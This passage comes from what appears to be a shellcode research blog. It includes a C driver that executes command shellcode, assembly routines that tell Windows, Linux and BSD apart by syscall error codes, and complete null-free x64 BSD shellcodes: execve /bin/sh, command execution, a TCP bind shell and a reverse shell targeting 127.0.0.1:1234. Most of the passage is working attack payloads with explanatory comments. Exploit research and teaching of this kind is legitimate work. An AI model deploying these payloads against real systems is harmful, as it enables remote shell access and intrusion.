    MAP_ANON  | MAP_PRIVATE, -1, 0);
  // mmap signals failure with MAP_FAILED, not NULL
  if (bin==MAP_FAILED) {
    bin=NULL;
  }
#endif
  if (bin!=NULL)
  {
    p=(uint8_t*)bin;
    
    memcpy (p, code, code_len);
    // set the cmd length
    p[CMD_LEN_OFS] = (uint8_t)cmd_len;
    // copy cmd
    memcpy ((void*)&p[code_len], cmd, cmd_len);
    // copy argv
    memcpy ((void*)&p[code_len+cmd_len], args, arg_len);
    
    //DebugBreak();
    bin2file(bin, total_len);
    
    // execute
    ((void(*)())bin)();
    
#ifdef WIN
    // MEM_RELEASE requires a size of 0; it frees the whole reservation
    VirtualFree (bin, 0, MEM_RELEASE);
#else
    // unmap everything that was mapped, not just the code part
    munmap (bin, total_len);
#endif
  }
}

// Test driver: xcmd <command>
// Appends the command to the exec[] code and runs the result through
// xcode(). The command length is stored in a single byte of the code,
// hence the 1..255 limit. Always returns 0.
int main(int argc, char *argv[])
{
    size_t len;
    char   *cmd;
    
    if (argc != 2) {
      printf ("\n  usage: xcmd <command>\n");
      return 0;
    }
    
    cmd=argv[1];
    len=strlen(cmd);
    
    if (len==0 || len>255) {
      // size_t must not be printed with %i; cast to a type printf knows
      printf ("\n  invalid command length: %lu (must be between 1 and 255)\n", 
        (unsigned long)len);
      return 0;
    }
    
    xcode(exec, EXEC_SIZE, cmd, len);
    
    return 0;
}

See repository here for code and any future updates.

Posted in assembly, bsd, linux, shellcode, windows | Tagged , , , , , | 1 Comment

Shellcode: Detection between Windows/Linux/BSD on x86 architecture

Introduction

While writing simple Linux/BSD shellcodes, I had a quick look through a FreeBSD/Linux bind shell written in 2002 by a talented coder who went by the pseudonym Z0MBiE. Some of you will know he wrote a lot of cool stuff back in the day.

Since most of the syscall numbers differ on Linux/BSD, he devised a clever way of detecting between the 2 using sys_close system call with an invalid handle. They both use the same call number (6) but return different error codes.

B3mB4m left a comment referencing a post from 2013 which also attempts to address the problem of detecting between Linux and Windows.

What I show here is really just the result of some hours work and not extensive research into how many ways it can be done because there are probably a number of ways to do it. The codes are for demonstration only, they’re unoptimized and unlikely to be updated anytime soon but feel free to leave comments on alternative methods. 🙂

Detection of CPU Mode

The steps are similar to what was discussed by some already but I check the stack pointer to make the distinction between 32-bit versions of Windows and Linux when the GS register is non-zero.

  1. Is our application executing 32-bit or 64-bit code? (determined by REX prefix)
  2. Are we running under 64-bit versions of Windows, Linux, BSD? (determined by sys_close and syscall, GS and SP registers tested for 32-bit windows)
  3. Are we Linux or BSD? (determined by sys_close and int 0x80)

To jump to 32-bit code, you could use

; Taken only when these bytes run as 32-bit code (assembled with bits 32).
; In 64-bit mode the one-byte "dec eax" opcode is decoded as a REX prefix,
; so SF stays clear from the xor and the jump falls through.
    xor    eax, eax         ; eax=0, SF=0
    dec    eax              ; 32-bit: eax=-1, SF=1
    js     x32

To jump to 64-bit code, you could use

; Taken only when these bytes run as 64-bit code (assembled with bits 32).
; In 64-bit mode the one-byte "inc eax" opcode is decoded as a REX prefix,
; so ZF is still set from the xor; in 32-bit mode eax becomes 1 and ZF clears.
    xor    eax, eax         ; eax=0, ZF=1
    inc    eax              ; 32-bit: eax=1, ZF=0
    jz     x64

Windows native or emulated?

For a 32-bit native application, GS should always be zero so here’s a function that returns TRUE for native else FALSE

; int is_32bit(void);
; Returns eax=1 when GS is zero, otherwise eax=0.
is_32bit:
    xor    eax, eax         ; clear upper half before the 16-bit load
    mov    ax, gs           ; eax = gs selector
    test   eax, eax         ; ZF=1 when gs is zero
    setz   al               ; al = (gs == 0)
    movzx  eax, al          ; drop the remaining selector bits in ah
    ret

I’m unaware of a reliable method to test for 32-bit native code on Linux or BSD systems. Perhaps there’s a way to perform checks on segment registers but I’ve no idea how reliable that would be.

Windows, Linux or BSD?

Initially, I had some rough ideas; manipulation of EFLAGS/RFLAGS, FPU instructions, value of segment registers, the contents of them.

The manipulation of FLAGS didn’t result in anything and neither did investigation of FPU control word (although MSVC and GNU C do set it differently by default)

Windows Segments

Unfortunately my current computer would not be capable of running Win8,2012 or Win10 so only Win7 was tested.

Windows 7 x86 PE32
cs=0x1B ds=0x23 es=0x23 fs=0x3B gs=0x00 ss=0x23 sp=0025F928
  
Windows 7 x64 PE32
cs=0x23 ds=0x2B es=0x2B fs=0x53 gs=0x2B ss=0x2B sp=0033F9C0

Windows 7 x64 PE64
cs=0x33 ds=0x2B es=0x2B fs=0x53 gs=0x2B ss=0x2B sp=000000000020FB48

As you can see, the stack pointer in both modes is a small value, so it is never negative when read as a signed 32/64-bit number.
Now look at BSD/Linux values.

OpenBSD

Only native ELF files were tested.

OpenBSD x86 ELF32
cs=0x2B ds=0x33 es=0x33 fs=0x5B gs=0x63 ss=0x33 sp=0xcf7c502c

OpenBSD x64 ELF64
cs=0x2B ds=0x23 es=0x23 fs=0x23 gs=0x23 ss=0x23 sp=0x7f7fffff7fe8

Compared with Windows, the stack pointer as 32-bit value is signed, but not always.

FreeBSD

FreeBSD x64 ELF32
cs=0x33 ds=0x3B es=0x3B fs=0x13 gs=0x1B ss=0x3B sp=0xffffda1c

FreeBSD x64 ELF64
cs=0x43 ds=0x3B es=0x3B fs=0x13 gs=0x1B ss=0x3B sp=0x7fffffffe8b8

Again, we can see that the 32-bit stack pointer is signed but this is not a sure thing.

Linux

Debian x86 ELF32
cs=0x73 ds=0x7B es=0x7B fs=0x00 gs=0x33 ss=0x7B sp=0xbfe7b97c

Debian x64 ELF32
cs=0x23 ds=0x2B es=0x2B fs=0x00 gs=0x63 ss=0x2B sp=0xffa66dbc
  
Debian x64 ELF64
cs=0x33 ds=0x00 es=0x00 fs=0x00 gs=0x00 ss=0x2B sp=0x7ffc88e3e048

*NIX or Windows?

Based on the results above, I initially thought testing the stack pointer for signedness would make the distinction between Windows or Linux/BSD and here’s code just to illustrate the idea.

; *************************
; int is_nix(void);
;
; Reports the sign bit of the low 32 bits of the stack pointer:
;   0=Windows x86/x64
;   1=BSD x86/x64 or Linux x86/x64
;
; *************************
    bits   32
is_nix:
    push   esp              ; copy esp/rsp ...
    pop    eax              ; ... into eax/rax
    shr    eax, 31          ; eax = bit 31 of the stack pointer (0 or 1)
    ret

This is okay except the 32-bits of SP on Linux/BSD isn’t always signed so it might make a nice random decision function if nothing else.

; *************************
; int is_nix(void);
;
; Reports whether the top byte of the 32-bit stack pointer is non-zero:
;   0=Windows x86/x64
;   1=BSD x86/x64 or Linux x86/x64
;
; *************************
    bits   32
is_nix:
    push   esp
    pop    eax
    shr    eax, 24          ; eax = top byte of the stack pointer
    neg    eax              ; CF=1 exactly when that byte was non-zero
    sbb    eax, eax         ; eax = -CF
    neg    eax              ; eax = CF (0 or 1)
    ret

This is a bit more reliable than the first version since, in the samples above, the Windows stack pointer sits below 16MB, so its top byte is zero, which is exactly what the shift by 24 tests. The stack location can obviously be changed (for example with the /STACK parameter of the MSVC linker) but this is what I thought works reasonably well to detect between 32-bit versions of Windows and Linux/BSD.

What was easier (at least on Windows 7 64-bit) was detection of 64-bit OS when using syscall.
Using the original method documented by Z0MBiE/29a for detecting FreeBSD/Linux, I was surprised that the 64-bit version will also work with Windows 7 and is maybe a potential solution for more recent versions of windows.

On 64-bit Windows 7, error returned is 0xC0000005 or Access Violation Error
On 64-bit Linux, error returned is 0xFFFFFFF2 or -14
On 64-bit BSD, error returned is 9

%define WIN64_NATIVE 0
%define LIN64_NATIVE 1
%define BSD64_NATIVE 2

%define WIN32_NATIVE 3
%define WIN32_EMULAT 4
%define LIN32_EMUNAT 5
%define BSD32_EMUNAT 6

; *************************
; int get_os(void);
;
; Returns one of the *_NATIVE / *_EMULAT / *_EMUNAT values above in eax.
; Assembled as 32-bit code; the same bytes are meant to run in 64-bit
; mode too, where the one-byte inc/dec opcodes act as REX prefixes.
;
; Clobbers: ecx, edx, flags (plus edi/rcx/r11 on the 64-bit path).
; ebx is saved and restored around the 32-bit probe.
; *************************
    bits   32
get_os:
_get_os:
    ; first, determine if we're in 32 or 64-bit mode
    push   6                ; syscall 6: close on 32-bit linux/bsd and 64-bit bsd
    pop    eax              ; rax/eax=6
    xor    edx, edx         ; rdx/edx=0 and SF=0, so the js below never
                            ; depends on flags left by the caller
    dec    edx              ; 32-bit: edx=-1, SF=1. 64-bit: REX prefix only
    js     x32
    ; see what 64-bit OS we're on
    push   -1               ; invalid descriptor, so the probe can never
    pop    edi              ; close a real one (rdi=-1)
    syscall                 ; on 64-bit linux number 6 is lstat; it fails too
    xor    edx, edx         ; edx=WIN64_NATIVE
    ; win64 native?
    cmp    eax, 0xC0000005  ; Access Violation?
    jz     ex_ga
    inc    dl               ; edx=LIN64_NATIVE
    test   eax, eax         
    jl     ex_ga            ; linux returns a negative error code
    mov    dl, BSD64_NATIVE ; bsd returns a positive errno
ex_ga:
    xchg   eax, edx
    ret
x32:
    inc    edx              ; edx=0 again
    mov    dl, WIN32_NATIVE
    ; if gs is zero, we're win32 native
    xor    ecx, ecx
    mov    cx, gs
    jecxz  ex_ga
    
    ; if gs isn't zero, we might be BSD or Linux 
    ; check SP instead
    ; just because eax would result in zero, doesn't
    ; necessarily mean we are on windows...
    push   esp
    pop    eax
    mov    dl, WIN32_EMULAT
    shr    eax, 24
    jz     ex_ga
    
    ; we could say fs being zero is linux
    ; but better to check with sys_close
    ;mov    cx, fs
    ;test   ecx, ecx
    ;jnz    ex_ga
    
    ; are we linux or bsd?
    ; no reliable way to determine if emulated
    ; or not since openbsd uses same value for
    ; some segments
    ;
    ; close(-1) through int 0x80: linux takes the descriptor in ebx,
    ; bsd takes it from the stack above a return-address slot
    push   ebx              ; ebx is callee-saved
    push   -1
    pop    ebx              ; linux: ebx=-1
    push   ebx              ; bsd: descriptor=-1
    push   ebx              ; bsd: dummy return-address slot
    push   6
    pop    eax              ; eax=sys_close (eax was clobbered by the shr)
    int    0x80
    pop    ecx              ; drop dummy slot
    pop    ecx              ; drop descriptor
    pop    ebx              ; restore caller's ebx
    push   LIN32_EMUNAT
    pop    edx
    test   eax, eax
    jl     ex_ga            ; linux returns a negative error code
    mov    dl, BSD32_EMUNAT
    jmp    ex_ga

Summary

There would have to be smarter ways of detecting operating systems running on the x86 architecture using assembly but would obviously result in more code. I’ve just presented a few bits of code that might be of interest to some. 🙂

Posted in assembly, bsd, freebsd, linux, programming, security, shellcode, windows | Tagged , , , , , , , | 4 Comments

Shellcode: FreeBSD / OpenBSD x86-64

Introduction

These are mostly the same as codes for x64 Linux with the main difference being system call numbers. I’ve also noticed that BSD tends to be less forgiving with parameters (at least for some functions). Initially, I couldn’t get execve() to work with NULL argv and NULL envp which works fine on Linux.

Well, it turns out the BSD kernel doesn’t like NULL argv and simply returns EFAULT (Bad Address) so you need to supply it. Apart from this, they’re almost identical and you probably could detect the difference between BSD and Linux kernels before executing the appropriate code.

Detection between Linux and BSD

Since you might be wondering how to do that..

One thing we know is that system calls on BSD trash specific registers whereas Linux saves them. That’s one way of checking..

But perhaps a more reliable method I found was used by Z0MBiE/29a in shellcode of his from 2002. He attempts to close an invalid handle/descriptor and depending on the error executes BSD or Linux code and this is probably the best approach.

; detect if linux/freebsd
; 32-bit code: calls close(-1) and branches on the sign of the result.
; The descriptor is passed both in ebx and on the stack, so the same
; int 80h works for either calling convention.
  pusha
  push    byte 6          ; FN: linux/freebsd: EAX=6=close()
  pop     eax
  xor     ebx, ebx
  dec     ebx
  push    ebx             ; PARAM: EBX=handle=-1
  push    esp             ; extra slot below the parameter
  int     80h             ; PARAMS: handle

  pop     ecx             ; discard the two pushed dwords
  pop     ecx
  or      eax, eax        ; linux: EAX=-9  freebsd: EAX=9=EBADF
  popa                    ; popa does not modify the flags set by "or"
  jl      short __linux   ; jl == jmp if linux ;)

sys_close() with invalid handle/descriptor returns number greater than zero on BSD but on Linux returns number less than zero.

So the above example works on x86 (in 2002) and the following will work for x64.

; detection of bsd/linux
; Issues syscall number 6 with an invalid argument and branches on the
; sign of the result. On 64-bit BSD number 6 is close; on 64-bit Linux
; it is lstat, which also fails with a negative error code.
    push    -1               ; invalid file descriptor
    pop     rdi
    push    6                ; sys_close (BSD numbering)
    pop     rax
    syscall
    test    eax, eax         ; BSD returns rax>0
    jl      linux            ; Linux returns rax<0
    ; execute bsd code here

I’m not demonstrating the mixture of Linux and BSD shellcode here today but that might be useful for somebody else to know. What follows are the x64 shellcodes for openbsd/freebsd.

Execute /bin/sh

Because sys_execve call is 59 on all 3 systems, this works with BSD and Linux.

; 24 byte execve("/bin//sh", {"/bin//sh", NULL}, 0);
; x64 versions of freebsd + openbsd + linux
; odzhan
;
; Builds the path string and the argv array on the stack; push/pop pairs
; are used instead of mov to keep the code short and free of null bytes.

    bits 64

    push    59
    pop     rax              ; rax=sys_execve
    cdq                      ; rdx=envp=0
    mov     rbx, '/bin//sh'  ; 8 characters, fills the register exactly
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    ; ---------
    push    rdx              ; argv[1]=NULL
    push    rdi              ; argv[0]="/bin//sh", 0
    push    rsp
    pop     rsi              ; rsi=argv
    ; ---------
    syscall

Execute a command

; 39 byte execve("/bin//sh", {"/bin//sh", "-c", cmd, NULL}, 0);
; x64 versions of freebsd + openbsd + linux
; odzhan
;
; The command string is expected directly after the final call; the
; return address pushed by that call doubles as argv[2].

    bits    64
start64:
    push    59
    pop     rax              ; rax=sys_execve
    cdq                      ; rdx=penv=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    ; ---------
    push    rdx              ; 0
    push    word '-c'        ; 2-byte push, terminated by the zero qword above
    push    rsp
    pop     rbx              ; rbx="-c", 0
    push    rdx              ; argv[3]=NULL
    jmp     l_cmd64          ; go fetch the address of the command
r_cmd64:                     ; argv[2]=cmd
    push    rbx              ; argv[1]="-c"
    push    rdi              ; argv[0]="/bin//sh"
    push    rsp
    pop     rsi              ; rsi=argv
    syscall
l_cmd64:
    call    r_cmd64          ; pushes the address of the bytes that follow
    ; put your command here followed by null terminator

Bind Shell

; 73 byte bind shell
; x64 versions of freebsd + openbsd
; odzhan
;
; Listens on TCP port 1234 on all interfaces, accepts one connection,
; attaches it to stdin/stdout/stderr and executes /bin//sh.
; Return values of the system calls are not checked.

    bits    64
    
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    97
    pop     rax              ; rax = sys_socket
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET 
    cdq                      ; rdx = IPPROTO_IP    
    syscall
    
    xchg    eax, edi         ; edi = s, eax = 2
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    ;
    ; BSD sockaddr_in starts with sin_len (byte 0) followed by
    ; sin_family (byte 1), so the family must land in the second byte:
    ;   FF 02 04 D2  ->  00 02 04 D2  after the inc
    ; (sin_len=0, sin_family=AF_INET, sin_port=1234 in network order).
    ; The FF placeholder keeps the immediate free of null bytes.
    mov     ebx, 0xD20402FF  ; 
    inc     bl               ; FF -> 00
    push    rbx              ; upper 32 bits of rbx are zero: INADDR_ANY
    push    rsp
    pop     rsi              ; rsi = &sa
    mov     dl, 16           ; rdx = sizeof(sa)
    mov     al, 104          ; rax = sys_bind
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    rax              ; rax = 0 after a successful bind
    pop     rsi              ; rsi = backlog = 0
    mov     al, 106          ; rax = sys_listen
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    ; rsi = 0, so no peer address is requested
    ; NOTE(review): rdx is not reloaded here; presumably it is ignored
    ; when the address pointer is NULL - confirm
    mov     al, 30           ; rax = sys_accept 
    syscall
    
    xchg    eax, edi         ; edi = r, eax = s (listening socket)
    xchg    eax, esi         ; esi = s, eax = 0
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; the loop counts down from s to 0, which covers
    ; dup2 (r, STDIN_FILENO)
    ; dup2 (r, STDOUT_FILENO)
    ; dup2 (r, STDERR_FILENO)
    ; as long as s >= 2
dup_loop64:
    mov     al, 90           ; rax = sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed   
    
    ; step 6, execute /bin/sh
    ; execve("/bin//sh", {"/bin//sh", NULL}, NULL);
    cdq                      ; rdx = 0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rdx              ; argv[1] = NULL
    push    rdi              ; argv[0] = "/bin//sh", 0
    push    rsp
    pop     rsi              ; rsi = argv
    ; ---------
    mov     al, 59           ; rax = sys_execve
    syscall

Reverse Shell

; 68 byte reverse shell
; x64 versions of freebsd + openbsd
; odzhan
;
; Connects to 127.0.0.1:1234, with the socket already attached to
; stdin/stdout/stderr, then executes /bin//sh.
; Return values of the system calls are not checked.

    bits    64
    
    ; sockaddr_in as one qword, stored inverted so the code holds no
    ; null bytes: 00 02 | 04 D2 | 7F 00 00 01
    ; (sin_len=0, sin_family=AF_INET, port 1234, 127.0.0.1)
    mov     rax, ~0x0100007fd2040200
    not     rax
    push    rax              ; sa
    push    rsp              ; &sa, popped again in step 3
    
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    97
    pop     rax              ; rax = sys_socket
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET  
    cdq                      ; rdx = IPPROTO_IP    
    syscall
    
    xchg    eax, edi         ; edi = s
    xchg    eax, esi         ; esi = 2
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2 (s, STDIN_FILENO)
    ; dup2 (s, STDOUT_FILENO)
    ; dup2 (s, STDERR_FILENO)
dup_loop64:
    mov     al, 90           ; rax = sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (s, &sa, sizeof(sa));
    pop     rsi              ; rsi = &sa
    mov     dl, 16           ; rdx = sizeof(sa)
    mov     al, 98           ; rax = sys_connect
    syscall    
    
    ; step 4, execute /bin/sh
    ; execve("/bin//sh", {"/bin//sh", NULL}, NULL);
    cdq                      ; rdx = 0
    mov     rbx, '/bin//sh'  ; 
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rdx              ; argv[1] = NULL
    push    rdi              ; argv[0] = "/bin//sh", 0
    push    rsp
    pop     rsi              ; rsi = argv
    ; ---------
    mov     al, 59           ; rax = sys_execve
    syscall

Sources

Check out bsd folder. The only code there compatible with linux would be sh64.asm

Q & A

Why not save bytes by MOV’ing immediate values into RSI, RDI etc. for SYSCALL rather than PUSH’ing them on the stack and POP’ing them into registers for SYSCALL?

The goal of writing codes like this is to 1) Minimize size and 2) Avoid using null bytes where ever possible.

If the immediate value is short form (between -128 and +127) the PUSH opcode is only 2 bytes. The POP is 1.

The same is true for direct/conditional jumps and calls or addressing variables on stack.

So when RDI needs set to AF_INET(2) and RSI set to SOCK_STREAM(1) for the sys_socket call, here are some ways you could do it using MOV.

Using lower 8 bit registers which doesn’t zero out the upper 56-bits. (6 bytes)

//
  /* 0000 */ "\x40\xb7\x02" /* mov dil, 0x2 */
  /* 0003 */ "\x40\xb6\x01" /* mov sil, 0x1 */

Using 32-bit registers which does clear upper 32-bit bits but takes 10 bytes and contains nulls.

//
  /* 0000 */ "\xbf\x02\x00\x00\x00" /* mov edi, 0x2 */
  /* 0005 */ "\xbe\x01\x00\x00\x00" /* mov esi, 0x1 */

Using 64-bit registers which is 14 bytes and contains nulls.

//
  /* 0000 */ "\x48\xc7\xc7\x02\x00\x00\x00" /* mov rdi, 0x2 */
  /* 0007 */ "\x48\xc7\xc6\x01\x00\x00\x00" /* mov rsi, 0x1 */

Using the PUSH/POP method because we know immediate values are short form.
This also zeros out upper 56-bits and doesn’t contain null bytes and only 6 bytes.

//
  /* 0000 */ "\x6a\x02" /* push 0x2 */
  /* 0002 */ "\x5f"     /* pop rdi  */
  /* 0003 */ "\x6a\x01" /* push 0x1 */
  /* 0005 */ "\x5e"     /* pop rsi  */

It is also acceptable 32-bit code (should it be needed)

//
  /* 0000 */ "\x6a\x02" /* push 0x2 */
  /* 0002 */ "\x5f"     /* pop edi  */
  /* 0003 */ "\x6a\x01" /* push 0x1 */
  /* 0005 */ "\x5e"     /* pop esi  */

There are obviously other ways to do this but they all result in being larger than a PUSH/POP combination.

Posted in assembly, bsd, freebsd, openbsd, shellcode | Tagged , , , , , | 2 Comments